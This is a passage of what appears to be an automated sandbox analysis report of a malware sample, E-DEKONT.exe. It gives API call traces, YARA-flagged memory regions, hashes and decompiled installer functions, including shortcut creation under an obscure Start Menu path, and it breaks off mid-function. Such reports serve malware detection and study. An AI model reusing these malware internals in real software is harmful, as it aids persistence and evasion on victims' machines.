                                                                              • Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\E-DEKONT.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                                              • Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\E-DEKONT.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                                            • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                                              • Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                                              • Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
                                                                              • Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra$Call
                                                                            • API String ID: 2624150263-2258434197
                                                                            • Opcode ID: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                                            • Instruction ID: b9cd804fa769b9c0a994065299bacf789a546679ae48146ccc486c737bfd155f
                                                                            • Opcode Fuzzy Hash: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                                            • Instruction Fuzzy Hash: CBA175F1A00209ABDB11AFA5CD41AAFB7B8EF84354F10847BF601B62D1D77C99418B6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 2#q$Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-1687289050
                                                                            • Opcode ID: d818b0eb64ce0ad9854e9fccbfcc3385ff31f2ec0a6c17407454b3175cbc674f
                                                                            • Instruction ID: 36a3fe988cfdbc39702dcf4f4b6a954688192d9d274fef51d2d2f847ed6cded2
                                                                            • Opcode Fuzzy Hash: d818b0eb64ce0ad9854e9fccbfcc3385ff31f2ec0a6c17407454b3175cbc674f
                                                                            • Instruction Fuzzy Hash: A0A1587924434A8FEB308E28CDD97EA37A2EF563D0F494269CC859B185D7398A46C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 2#q$Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-1687289050
                                                                            • Opcode ID: 266755f435d5340c1b58bb6a662764ffba161568258390d6c18ae8719b3149d7
                                                                            • Instruction ID: fa571488b7b58ddfd92660c9765f9fc882ba45168a7d2159c67b59bf7d66dcec
                                                                            • Opcode Fuzzy Hash: 266755f435d5340c1b58bb6a662764ffba161568258390d6c18ae8719b3149d7
                                                                            • Instruction Fuzzy Hash: 20A1697924434A8FEB308E28CDD97EA37A2EF523D0F49426ACC859B185D73D8A46C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: f3def7bab03f3e2fa1fa34b3490e0d401e7b68ae3f96e22cbcbcd137bbf239d6
                                                                            • Instruction ID: 9a09b174b7ae1fa0413e452b5ddb8539fce55b97ffc2484baee44eebf7a0a3f2
                                                                            • Opcode Fuzzy Hash: f3def7bab03f3e2fa1fa34b3490e0d401e7b68ae3f96e22cbcbcd137bbf239d6
                                                                            • Instruction Fuzzy Hash: 0AA157791083879BEB369E28C9853DA3BA2AF132F0F98456ECCC85F446CB3645C5C212
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: e0372ee866f21c3f0097aa7294013caa11e2b32baa3a6f1c70cfdc2503572629
                                                                            • Instruction ID: effdaebb0e646da842b34b8df0328acc5298e79a3eca10591ac1b60e2dc6e0ef
                                                                            • Opcode Fuzzy Hash: e0372ee866f21c3f0097aa7294013caa11e2b32baa3a6f1c70cfdc2503572629
                                                                            • Instruction Fuzzy Hash: 4AA157791083879BEB369E28C9953DA3BA2EF132F0F98456ECCC85F446DB3645C5C212
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: fc9cf44c014810ac6ec75f277f6a8ff6402e9591a723b13bbf683d2c17637308
                                                                            • Instruction ID: 8a8a073b48ec5c4765462bfb91dc0897eb8176d204b374ae4a9d73d78238638f
                                                                            • Opcode Fuzzy Hash: fc9cf44c014810ac6ec75f277f6a8ff6402e9591a723b13bbf683d2c17637308
                                                                            • Instruction Fuzzy Hash: A7A149791083869BEB359E28C9953DA3BA2EF133E4F98456ECCC85F446D73A45C5C212
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: c814d183f9171d3b4ae4d7749d851c2a53aca80e710e7f13d6afb68847136e00
                                                                            • Instruction ID: 00dbcd36802828604c248dedcd926c5abb1a44e35f386c5cecc9da7ba32b9d87
                                                                            • Opcode Fuzzy Hash: c814d183f9171d3b4ae4d7749d851c2a53aca80e710e7f13d6afb68847136e00
                                                                            • Instruction Fuzzy Hash: EDA158791083879BEB359E28C9953DA3BA2EF133E0F98456ECCC85F446D73645C5C212
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: dffba3f43f7ebc82137cfae4e578b0442fc1c2406bba49dadb016ae34e3eee5e
                                                                            • Instruction ID: e8d1d898c627bc0e686f60b0b0fbccbbbb917f85e73865d9e3e3429594c220a2
                                                                            • Opcode Fuzzy Hash: dffba3f43f7ebc82137cfae4e578b0442fc1c2406bba49dadb016ae34e3eee5e
                                                                            • Instruction Fuzzy Hash: D6A148791083868BEB359E28C9953DA3BA2EF133E0F98456ECCC85F446D73A55C5C212
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: 71f055f61aeadcd4923cf639d781be622db5098ab53702c5083304510269172d
                                                                            • Instruction ID: aad66248f404406fce81b4887247e269571c5c7b136dabbce821b69d22c54c52
                                                                            • Opcode Fuzzy Hash: 71f055f61aeadcd4923cf639d781be622db5098ab53702c5083304510269172d
                                                                            • Instruction Fuzzy Hash: A6A15B791083869BEB319E28CD953DA3BA2EF133F0F98427ECCC45B586D73A5585C642
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: d92d6615d7613a6af528b69bc217965e801271a87ceb7a4bd47d8cf3cc5887ea
                                                                            • Instruction ID: e46f3106e68be4909897249bd01937c1fb749fe61b68b41c6205f633caee5c1f
                                                                            • Opcode Fuzzy Hash: d92d6615d7613a6af528b69bc217965e801271a87ceb7a4bd47d8cf3cc5887ea
                                                                            • Instruction Fuzzy Hash: ECA139791043868FDB319E28CD953DA3BA2EF523E0F59417ECC885B545D73A4686C711
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: 05c2bd5554eff1ffa58d1b35ed90b3e0625fa3edd5af651f9c2a1183a1a22e2f
                                                                            • Instruction ID: b8999ed81a0004c296d8e64295e4b2ad5fe310431dc37b2ea2b17d53ec0234b9
                                                                            • Opcode Fuzzy Hash: 05c2bd5554eff1ffa58d1b35ed90b3e0625fa3edd5af651f9c2a1183a1a22e2f
                                                                            • Instruction Fuzzy Hash: 5391487964434A8FEB308E38CDD57DA37A2EF523D0F19427ACC89AB185D7398A46C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: 1e722726efeed66b7d42f8167c1a2ae31e58891d823a01df2961c36818c8aa5d
                                                                            • Instruction ID: 1423c2baf93683bb6e19c879fb81cd5d4fdbf8d72c08d62216546420301fafa3
                                                                            • Opcode Fuzzy Hash: 1e722726efeed66b7d42f8167c1a2ae31e58891d823a01df2961c36818c8aa5d
                                                                            • Instruction Fuzzy Hash: C991467964438A8FDB308E28CDD57DA37B2EF523D0F19427ACC88AB185D7398A46C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Q=v/$Q=v/$v}Hj
                                                                            • API String ID: 0-35103605
                                                                            • Opcode ID: 576ff42e257a1448d3192849f85beb698130295c8f558adf185966ec34fdf3d1
                                                                            • Instruction ID: 98456cffed8df47db789efced960ffe11f11aa186d114367b2ba0173ee9417e1
                                                                            • Opcode Fuzzy Hash: 576ff42e257a1448d3192849f85beb698130295c8f558adf185966ec34fdf3d1
                                                                            • Instruction Fuzzy Hash: 4191477964434A8FEB308E38CDD57DA37A2EF523D0F59427ACC89AB185D7398A46C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                            			E004020FE() {
                                                                            				signed int _t52;
                                                                            				void* _t56;
                                                                            				intOrPtr* _t60;
                                                                            				intOrPtr _t61;
                                                                            				intOrPtr* _t62;
                                                                            				intOrPtr* _t64;
                                                                            				intOrPtr* _t66;
                                                                            				intOrPtr* _t68;
                                                                            				intOrPtr* _t70;
                                                                            				intOrPtr* _t72;
                                                                            				intOrPtr* _t74;
                                                                            				intOrPtr* _t76;
                                                                            				intOrPtr* _t78;
                                                                            				intOrPtr* _t80;
                                                                            				void* _t83;
                                                                            				intOrPtr* _t91;
                                                                            				signed int _t101;
                                                                            				signed int _t105;
                                                                            				void* _t107;
                                                                            
                                                                            				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
                                                                            				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
                                                                            				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
                                                                            				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
                                                                            				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
                                                                            				_t52 =  *(_t107 - 0x18);
                                                                            				 *(_t107 - 0x44) = _t52 & 0x00000fff;
                                                                            				_t101 = _t52 & 0x00008000;
                                                                            				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                            				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                            				if(E00405BCA( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
                                                                            					E00402C37(0x21);
                                                                            				}
                                                                            				_t56 = _t107 + 8;
                                                                            				__imp__CoCreateInstance(0x4085e8, _t83, 1, 0x4085d8, _t56);
                                                                            				if(_t56 < _t83) {
                                                                            					L14:
                                                                            					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                            					_push(0xfffffff0);
                                                                            				} else {
                                                                            					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                            					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4085f8, _t107 - 0x30);
                                                                            					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
                                                                            					if(_t61 >= _t83) {
                                                                            						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                            						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
                                                                            						if(_t101 == _t83) {
                                                                            							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                            							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra\\Sldede");
                                                                            						}
                                                                            						if(_t105 != _t83) {
                                                                            							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                            							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                            						}
                                                                            						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                            						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
                                                                            						_t91 =  *((intOrPtr*)(_t107 - 0x48));
                                                                            						if( *_t91 != _t83) {
                                                                            							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                            							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
                                                                            						}
                                                                            						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                            						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                            						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                            						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                            						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
                                                                            							_t74 =  *((intOrPtr*)(_t107 - 0x30));
                                                                            							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), 1);
                                                                            						}
                                                                            						_t72 =  *((intOrPtr*)(_t107 - 0x30));
                                                                            						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                            					}
                                                                            					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                            					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                            					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
                                                                            						_push(0xfffffff4);
                                                                            					} else {
                                                                            						goto L14;
                                                                            					}
                                                                            				}
                                                                            				E00401423();
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                                            				return 0;
                                                                            			}






















                                                                            APIs
                                                                            • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede, xrefs: 004021BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede
                                                                            • API String ID: 542301482-935500906
                                                                            • Opcode ID: 0ef6bbf442897ef527506715e7f738d692543a3abdbaa0dc7b7a5ab61d8902ee
                                                                            • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                                            • Opcode Fuzzy Hash: 0ef6bbf442897ef527506715e7f738d692543a3abdbaa0dc7b7a5ab61d8902ee
                                                                            • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID: 003%$Fd
                                                                            • API String ID: 2706961497-3480626170
                                                                            • Opcode ID: 868f49dcc24e561babb3abe965351983664b02386f25a0428222fcf0f1ac00ba
                                                                            • Instruction ID: 6f9711f31d7b1e14759b9679afdfe06ca9a551d4fb5a1942c291c6c6b6bb52b1
                                                                            • Opcode Fuzzy Hash: 868f49dcc24e561babb3abe965351983664b02386f25a0428222fcf0f1ac00ba
                                                                            • Instruction Fuzzy Hash: 1C728A715043828FCB35AE3889983D67BE29F532A0F5981EECCD98F597D335858AC712
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004072B4(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                            				signed int _v8;
                                                                            				unsigned int _v12;
                                                                            				signed int _v16;
                                                                            				intOrPtr _v20;
                                                                            				signed int _v24;
                                                                            				signed int _v28;
                                                                            				intOrPtr* _v32;
                                                                            				signed int* _v36;
                                                                            				signed int _v40;
                                                                            				signed int _v44;
                                                                            				intOrPtr _v48;
                                                                            				intOrPtr _v52;
                                                                            				void _v116;
                                                                            				signed int _v176;
                                                                            				signed int _v180;
                                                                            				signed int _v240;
                                                                            				signed int _t166;
                                                                            				signed int _t168;
                                                                            				intOrPtr _t175;
                                                                            				signed int _t181;
                                                                            				void* _t182;
                                                                            				intOrPtr _t183;
                                                                            				signed int* _t184;
                                                                            				signed int _t186;
                                                                            				signed int _t187;
                                                                            				signed int* _t189;
                                                                            				signed int _t190;
                                                                            				intOrPtr* _t191;
                                                                            				intOrPtr _t192;
                                                                            				signed int _t193;
                                                                            				signed int _t195;
                                                                            				signed int _t200;
                                                                            				signed int _t205;
                                                                            				void* _t207;
                                                                            				short _t208;
                                                                            				signed char _t222;
                                                                            				signed int _t224;
                                                                            				signed int _t225;
                                                                            				signed int* _t232;
                                                                            				signed int _t233;
                                                                            				signed int _t234;
                                                                            				void* _t235;
                                                                            				signed int _t236;
                                                                            				signed int _t244;
                                                                            				signed int _t246;
                                                                            				signed int _t251;
                                                                            				signed int _t254;
                                                                            				signed int _t256;
                                                                            				signed int _t259;
                                                                            				signed int _t262;
                                                                            				void* _t263;
                                                                            				void* _t264;
                                                                            				signed int _t267;
                                                                            				intOrPtr _t269;
                                                                            				intOrPtr _t271;
                                                                            				signed int _t274;
                                                                            				intOrPtr* _t275;
                                                                            				unsigned int _t276;
                                                                            				void* _t277;
                                                                            				signed int _t278;
                                                                            				intOrPtr* _t279;
                                                                            				signed int _t281;
                                                                            				intOrPtr _t282;
                                                                            				intOrPtr _t283;
                                                                            				signed int* _t284;
                                                                            				signed int _t286;
                                                                            				signed int _t287;
                                                                            				signed int _t288;
                                                                            				intOrPtr _t296;
                                                                            				signed int* _t297;
                                                                            				intOrPtr _t298;
                                                                            				void* _t299;
                                                                            
                                                                            				_t278 = _a8;
                                                                            				_t187 = 0x10;
                                                                            				memset( &_v116, 0, _t187 << 2);
                                                                            				_t189 = _a4;
                                                                            				_t233 = _t278;
                                                                            				do {
                                                                            					_t166 =  *_t189;
                                                                            					_t189 =  &(_t189[1]);
                                                                            					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                            					_t233 = _t233 - 1;
                                                                            				} while (_t233 != 0);
                                                                            				if(_v116 != _t278) {
                                                                            					_t279 = _a28;
                                                                            					_t267 =  *_t279;
                                                                            					_t190 = 1;
                                                                            					_a28 = _t267;
                                                                            					_t234 = 0xf;
                                                                            					while(1) {
                                                                            						_t168 = 0;
                                                                            						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                            							break;
                                                                            						}
                                                                            						_t190 = _t190 + 1;
                                                                            						if(_t190 <= _t234) {
                                                                            							continue;
                                                                            						}
                                                                            						break;
                                                                            					}
                                                                            					_v8 = _t190;
                                                                            					if(_t267 < _t190) {
                                                                            						_a28 = _t190;
                                                                            					}
                                                                            					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                            						_t234 = _t234 - 1;
                                                                            						if(_t234 != 0) {
                                                                            							continue;
                                                                            						}
                                                                            						break;
                                                                            					}
                                                                            					_v28 = _t234;
                                                                            					if(_a28 > _t234) {
                                                                            						_a28 = _t234;
                                                                            					}
                                                                            					 *_t279 = _a28;
                                                                            					_t181 = 1 << _t190;
                                                                            					while(_t190 < _t234) {
                                                                            						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                            						if(_t182 < 0) {
                                                                            							L64:
                                                                            							return _t168 | 0xffffffff;
                                                                            						}
                                                                            						_t190 = _t190 + 1;
                                                                            						_t181 = _t182 + _t182;
                                                                            					}
                                                                            					_t281 = _t234 << 2;
                                                                            					_t191 = _t299 + _t281 - 0x70;
                                                                            					_t269 =  *_t191;
                                                                            					_t183 = _t181 - _t269;
                                                                            					_v52 = _t183;
                                                                            					if(_t183 < 0) {
                                                                            						goto L64;
                                                                            					}
                                                                            					_v176 = _t168;
                                                                            					 *_t191 = _t269 + _t183;
                                                                            					_t192 = 0;
                                                                            					_t235 = _t234 - 1;
                                                                            					if(_t235 == 0) {
                                                                            						L21:
                                                                            						_t184 = _a4;
                                                                            						_t271 = 0;
                                                                            						do {
                                                                            							_t193 =  *_t184;
                                                                            							_t184 =  &(_t184[1]);
                                                                            							if(_t193 != _t168) {
                                                                            								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                            								_t236 =  *_t232;
                                                                            								 *((intOrPtr*)(0x432170 + _t236 * 4)) = _t271;
                                                                            								 *_t232 = _t236 + 1;
                                                                            							}
                                                                            							_t271 = _t271 + 1;
                                                                            						} while (_t271 < _a8);
                                                                            						_v16 = _v16 | 0xffffffff;
                                                                            						_v40 = _v40 & 0x00000000;
                                                                            						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                            						_t195 = _v8;
                                                                            						_t186 =  ~_a28;
                                                                            						_v12 = _t168;
                                                                            						_v180 = _t168;
                                                                            						_v36 = 0x432170;
                                                                            						_v240 = _t168;
                                                                            						if(_t195 > _v28) {
                                                                            							L62:
                                                                            							_t168 = 0;
                                                                            							if(_v52 == 0 || _v28 == 1) {
                                                                            								return _t168;
                                                                            							} else {
                                                                            								goto L64;
                                                                            							}
                                                                            						}
                                                                            						_v44 = _t195 - 1;
                                                                            						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                            						do {
                                                                            							_t282 =  *_v32;
                                                                            							if(_t282 == 0) {
                                                                            								goto L61;
                                                                            							}
                                                                            							while(1) {
                                                                            								_t65 =  &_a28; // 0x432170
                                                                            								_t283 = _t282 - 1;
                                                                            								_t200 =  *_t65 + _t186;
                                                                            								_v48 = _t283;
                                                                            								_v24 = _t200;
                                                                            								if(_v8 <= _t200) {
                                                                            									goto L45;
                                                                            								}
                                                                            								L31:
                                                                            								_v20 = _t283 + 1;
                                                                            								do {
                                                                            									_v16 = _v16 + 1;
                                                                            									_t296 = _v28 - _v24;
                                                                            									_t74 =  &_a28; // 0x432170
                                                                            									if(_t296 >  *_t74) {
                                                                            										_t75 =  &_a28; // 0x432170
                                                                            										_t296 =  *_t75;
                                                                            									}
                                                                            									_t222 = _v8 - _v24;
                                                                            									_t254 = 1 << _t222;
                                                                            									if(1 <= _v20) {
                                                                            										L40:
                                                                            										_t256 =  *_a36;
                                                                            										_t168 = 1 << _t222;
                                                                            										_v40 = 1;
